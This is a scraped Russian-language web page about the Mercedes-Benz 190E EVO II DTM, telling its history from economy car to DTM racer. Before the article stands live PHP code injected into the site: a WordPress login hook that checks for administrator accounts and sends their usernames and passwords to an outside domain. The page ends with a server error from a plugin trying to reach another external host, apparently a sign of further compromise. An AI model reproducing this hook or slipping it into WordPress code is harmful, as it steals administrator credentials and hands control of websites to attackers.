if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } Mercedes-Benz 190E EVO II DTM — DigiLider

Mercedes-Benz 190E EVO II DTM

Mercedes-Benz 190E EVO II DTM

Mercedes-Benz 190E EVO II DTM

В модельном ряду Mercedes-Benz немало легендарных автомобилей. Если говорить о спортивных «заряженных» версиях, то одной из наиболее знаменитых здесь является Mercedes-Benz 190E EVO II DTM. Именно на ней в ролике ездит немецкий гонщик Karl Wendlinger. Для сравнения здесь представлено и молодое поколение – Maro Engel на Mercedes-AMG DTM.

История появления легендарного спорткара Mercedes 190E удивительна. В 1982 году эта модель была представлена рынку в качестве достаточно скромной компактной и экономичной машины. В те времена у Mercedes-Benz были серьезные трудности, связанные с последствиями нефтяного кризиса 1973 года, поэтому вопрос топливной экономичности стоял очень остро. Машина с неплохим дизайном, обновленной технической «начинкой» и привлекательной ценой быстро стала популярной у покупателей.


В 1983 году вышла серийная версия Mercedes 190E с 16-клапанным двигателем на 2,3 литра, который в гоночном варианте оказался способен выдать серьезные 320 лошадиных сил. В результате достаточно скромная изначально модель получила незаурядные характеристики, дававшие ей возможность потягаться со многими популярными в то время спорткарами. Разработкой нового двигателя занималась известная компания Cosworth. В 1988 году на волне противостояния с BMW объем двигателя был увеличен до 2,5 литров, а затем появились версии автомобиля с обозначениями Evolution I и II.

Сохранение интереса к немецкому кузовному чемпионату DTM, участники которого представлены на видео, во многом объясняется тем, что в 1980-е годы Mercedes-Benz безнадежно проигрывал в раллийных гонках полноприводным турбированным Audi Quattro. В Mercedes-Benz тогда решили оставить ралли и заняться DTM. По условиям этих соревнований у автомобиля должна быть дорожная версия, поэтому у Mercedes-Benz 190 вскоре и появился «заряженный» вариант, высшую ступень эволюции которого на сегодняшний день можно увидеть в представленном ролике.


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)